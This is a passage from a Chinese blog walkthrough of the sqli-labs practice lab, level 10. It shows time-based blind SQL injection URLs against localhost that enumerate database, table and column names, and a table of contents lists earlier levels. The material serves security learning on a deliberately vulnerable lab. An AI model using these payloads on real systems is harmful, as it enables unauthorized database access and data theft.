<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy71svhcj31hb075js1.jpg" alt="图片描述"></p>
<h3 id="3、判断所有数据库的名字-1"><a href="#3、判断所有数据库的名字-1" class="headerlink" title="3、判断所有数据库的名字"></a>3、判断所有数据库的名字</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-10&#x2F;?id&#x3D;1&quot; and if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))&gt;1000,1,sleep(5)) %23</span><br></pre></td></tr></table></figure>

<p>用软件和工具更加方便</p>
<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy8cb8x2j31hc05ut93.jpg" alt="图片描述"></p>
<h3 id="4、判断当前库里面的所有表名-1"><a href="#4、判断当前库里面的所有表名-1" class="headerlink" title="4、判断当前库里面的所有表名"></a>4、判断当前库里面的所有表名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli&#x2F;Less-10&#x2F;?id&#x3D;1&quot; and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),1,1))&gt;1000,1,sleep(5)) %23</span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggy9qs24hj31hc07mmxn.jpg" alt="图片描述"></p>
<h3 id="5、判断当前表里所有的字段名-1"><a href="#5、判断当前表里所有的字段名-1" class="headerlink" title="5、判断当前表里所有的字段名"></a>5、判断当前表里所有的字段名</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli/Less-10/?id=1" and if(ascii(substr((<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="string">'users'</span>),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">1000</span>,<span class="number">1</span>,<span class="keyword">sleep</span>(<span class="number">5</span>)) %<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="http://ww1.sinaimg.cn/large/006ZDEGPly1gggyae5pzuj31h803ct8t.jpg" alt="图片描述"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/WEB/" rel="tag"># WEB</a>
              <a href="/tags/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/" rel="tag"># 信息安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/06/26/%E5%90%8E%E7%AB%AF/PHP%E5%85%A5%E9%97%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="prev" title="PHP入门笔记">
      <i class="fa fa-chevron-left"></i> PHP入门笔记
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/07/05/WEB/sqlmap%E7%9A%84%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8/" rel="next" title="sqlmap基本使用">
      sqlmap基本使用 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#第一关字符型注入-解析过程"><span class="nav-number">1.</span> <span class="nav-text">第一关字符型注入 解析过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-查询字段："><span class="nav-number">1.0.1.</span> <span class="nav-text">1.查询字段：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-查询回显点："><span class="nav-number">1.0.2.</span> <span class="nav-text">2.查询回显点：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-查询数据库版本信息："><span class="nav-number">1.0.3.</span> <span class="nav-text">3.查询数据库版本信息：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-查询当前数据库和用户："><span class="nav-number">1.0.4.</span> <span class="nav-text">4.查询当前数据库和用户：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-查询所有数据库："><span class="nav-number">1.0.5.</span> <span class="nav-text">5.查询所有数据库：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-查询表名："><span class="nav-number">1.0.6.</span> <span class="nav-text">6.查询表名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-查询列名："><span class="nav-number">1.0.7.</span> <span class="nav-text">7.查询列名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-查询用户名和密码："><span class="nav-number">1.0.8.</span> <span class="nav-text">8.查询用户名和密码：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#第二关整数型注入-解析过程"><span class="nav-number">2.</span> <span class="nav-text">第二关整数型注入 解析过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-查询字段：-1"><span class="nav-number">2.0.1.</span> <span class="nav-text">1.查询字段：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-查询回显点：-1"><span class="nav-number">2.0.2.</span> <span class="nav-text">2.查询回显点：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-查询数据库版本信息：-1"><span class="nav-number">2.0.3.</span> <span class="nav-text">3.查询数据库版本信息：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-查询当前数据库和用户：-1"><span class="nav-number">2.0.4.</span> <span class="nav-text">4.查询当前数据库和用户：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-查询所有数据库：-1"><span class="nav-number">2.0.5.</span> <span class="nav-text">5.查询所有数据库：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-查询表名：-1"><span class="nav-number">2.0.6.</span> <span class="nav-text">6.查询表名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-查询列名：-1"><span class="nav-number">2.0.7.</span> <span class="nav-text">7.查询列名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-查询用户名和密码：-1"><span class="nav-number">2.0.8.</span> <span class="nav-text">8.查询用户名和密码：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#第三关字符型注入-解析过程"><span class="nav-number">3.</span> <span class="nav-text">第三关字符型注入 解析过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#‘’判断闭合点"><span class="nav-number">3.0.1.</span> <span class="nav-text">‘’判断闭合点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-查询字段：-2"><span class="nav-number">3.0.2.</span> <span class="nav-text">1.查询字段：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-查询回显点：-2"><span class="nav-number">3.0.3.</span> <span class="nav-text">2.查询回显点：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-查询数据库版本信息：-2"><span class="nav-number">3.0.4.</span> <span class="nav-text">3.查询数据库版本信息：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-查询当前数据库和用户：-2"><span class="nav-number">3.0.5.</span> <span class="nav-text">4.查询当前数据库和用户：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-查询所有数据库：-2"><span class="nav-number">3.0.6.</span> <span class="nav-text">5.查询所有数据库：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-查询表名：-2"><span class="nav-number">3.0.7.</span> <span class="nav-text">6.查询表名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-查询列名：-2"><span class="nav-number">3.0.8.</span> <span class="nav-text">7.查询列名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-查询用户名和密码：-2"><span class="nav-number">3.0.9.</span> <span class="nav-text">8.查询用户名和密码：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#第四关字符型注入-解析过程"><span class="nav-number">4.</span> <span class="nav-text">第四关字符型注入 解析过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#‘’判断闭合点-1"><span class="nav-number">4.0.1.</span> <span class="nav-text">‘’判断闭合点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-查询字段：-3"><span class="nav-number">4.0.2.</span> <span class="nav-text">1.查询字段：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-查询回显点：-3"><span class="nav-number">4.0.3.</span> <span class="nav-text">2.查询回显点：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-查询数据库版本信息：-3"><span class="nav-number">4.0.4.</span> <span class="nav-text">3.查询数据库版本信息：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-查询当前数据库和用户：-3"><span class="nav-number">4.0.5.</span> <span class="nav-text">4.查询当前数据库和用户：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-查询所有数据库：-3"><span class="nav-number">4.0.6.</span> <span class="nav-text">5.查询所有数据库：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-查询表名：-3"><span class="nav-number">4.0.7.</span> <span class="nav-text">6.查询表名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-查询列名：-3"><span class="nav-number">4.0.8.</span> <span class="nav-text">7.查询列名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-查询用户名和密码：-3"><span class="nav-number">4.0.9.</span> <span class="nav-text">8.查询用户名和密码：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#第五关（布尔盲注）"><span class="nav-number">5.</span> <span class="nav-text">第五关（布尔盲注）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-先看是否有注入点"><span class="nav-number">5.0.1.</span> <span class="nav-text">1.先看是否有注入点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-查看有多少列"><span class="nav-number">5.0.2.</span> <span class="nav-text">2.查看有多少列</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-判断当前数据库名称"><span class="nav-number">5.0.3.</span> <span class="nav-text">3.判断当前数据库名称</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#方法1"><span class="nav-number">5.0.3.1.</span> <span class="nav-text">方法1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#方法2"><span class="nav-number">5.0.3.2.</span> <span class="nav-text">方法2</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#完整的注入流程"><span class="nav-number">5.0.3.3.</span> <span class="nav-text">完整的注入流程</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#爆破过程"><span class="nav-number">5.0.3.3.1.</span> <span class="nav-text">爆破过程</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#第五关（报错注入（rand-group-count-））"><span class="nav-number">5.1.</span> <span class="nav-text">第五关（报错注入（rand() + group() + count()））</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1、报错原因："><span class="nav-number">5.1.1.</span> <span class="nav-text">1、报错原因：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2、查询库名："><span class="nav-number">5.1.2.</span> <span class="nav-text">2、查询库名：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3、查询表名"><span class="nav-number">5.1.3.</span> <span class="nav-text">3、查询表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4、查询字段名"><span class="nav-number">5.1.4.</span> <span class="nav-text">4、查询字段名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5、查询数据"><span class="nav-number">5.1.5.</span> <span class="nav-text">5、查询数据</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#第六关（盲注）-采用python的方式"><span class="nav-number">5.2.</span> <span class="nav-text">第六关（盲注） 采用python的方式</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#利用requests库-threading库-盲注"><span class="nav-number">5.2.1.</span> <span class="nav-text">利用requests库+threading库+盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#requests库的作用："><span class="nav-number">5.2.1.1.</span> <span class="nav-text">requests库的作用：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#threading库的作用："><span class="nav-number">5.2.1.2.</span> <span class="nav-text">threading库的作用：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#利用线程全速获取网页请求，让盲注变得不这么慢"><span class="nav-number">5.2.1.2.1.</span> <span class="nav-text">利用线程全速获取网页请求，让盲注变得不这么慢</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#优点：好像除了速度快就没啥了"><span class="nav-number">5.2.1.2.2.</span> <span class="nav-text">优点：好像除了速度快就没啥了</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#缺点：因为多线程的缘故，同步锁好像启动不了，容易不按照顺序获取字符串，可能往二分法改进会更好，但是目前没有思路利用threading-二分法"><span class="nav-number">5.2.1.2.3.</span> <span class="nav-text">缺点：因为多线程的缘故，同步锁好像启动不了，容易不按照顺序获取字符串，可能往二分法改进会更好，但是目前没有思路利用threading+二分法</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#结果："><span class="nav-number">5.2.1.3.</span> <span class="nav-text">结果：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#第七关-文件导出"><span class="nav-number">5.3.</span> <span class="nav-text">第七关 文件导出</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#第八题-采用sqlmap进行注入"><span class="nav-number">5.4.</span> <span class="nav-text">第八题 采用sqlmap进行注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1、看一下是否可以注入"><span class="nav-number">5.4.1.</span> <span class="nav-text">1、看一下是否可以注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2、查询库"><span class="nav-number">5.4.2.</span> <span class="nav-text">2、查询库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3、查询表"><span class="nav-number">5.4.3.</span> <span class="nav-text">3、查询表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4、查询字段"><span class="nav-number">5.4.4.</span> <span class="nav-text">4、查询字段</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#第九题（基于时间盲注）"><span class="nav-number">5.5.</span> <span class="nav-text">第九题（基于时间盲注）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1、判断是否存在注入"><span class="nav-number">5.5.1.</span> <span class="nav-text">1、判断是否存在注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2、判断当前数据库的长度"><span class="nav-number">5.5.2.</span> <span class="nav-text">2、判断当前数据库的长度</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3、判断所有数据库的名字"><span class="nav-number">5.5.3.</span> <span class="nav-text">3、判断所有数据库的名字</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4、判断当前库里面的所有表名"><span class="nav-number">5.5.4.</span> <span class="nav-text">4、判断当前库里面的所有表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5、判断当前表里所有的字段名"><span class="nav-number">5.5.5.</span> <span class="nav-text">5、判断当前表里所有的字段名</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#第十题（基于时间盲注）"><span class="nav-number">5.6.</span> <span class="nav-text">第十题（基于时间盲注）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1、判断是否存在注入-1"><span class="nav-number">5.6.1.</span> <span class="nav-text">1、判断是否存在注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2、判断当前数据库的长度-1"><span class="nav-number">5.6.2.</span> <span class="nav-text">2、判断当前数据库的长度</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3、判断所有数据库的名字-1"><span class="nav-number">5.6.3.</span> <span class="nav-text">3、判断所有数据库的名字</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4、判断当前库里面的所有表名-1"><span class="nav-number">5.6.4.</span> <span class="nav-text">4、判断当前库里面的所有表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5、判断当前表里所有的字段名-1"><span class="nav-number">5.6.5.</span> <span class="nav-text">5、判断当前表里所有的字段名</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="逸晨"
      src="/images/tx.jpeg">
  <p class="site-author-name" itemprop="name">逸晨</p>
  <div class="site-description" itemprop="description">直到这一刻微笑着说话为止，我至少留下了一公升眼泪</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/YiChenNet" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;YiChenNet" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1605732986@qq.com" title="E-Mail → mailto:1605732986@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/6407604695" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;6407604695" rel="noopener" target="_blank"><i class="fab fa-weibo fa-fw"></i>Weibo</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.baidu.com/" title="https:&#x2F;&#x2F;www.baidu.com&#x2F;" rel="noopener" target="_blank">Baidu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://github.com/" title="https:&#x2F;&#x2F;github.com&#x2F;" rel="noopener" target="_blank">Github</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">逸晨</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">125k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:53</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'uJtl3uLuOiFKO26QncHHBcDq-gzGzoHsz',
      appKey     : 'Ft83hPuo2K0B3aGr0N7CWt5w',
      placeholder: "留下邮箱，有回复时你将收到提醒，邮箱不会被公开。",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
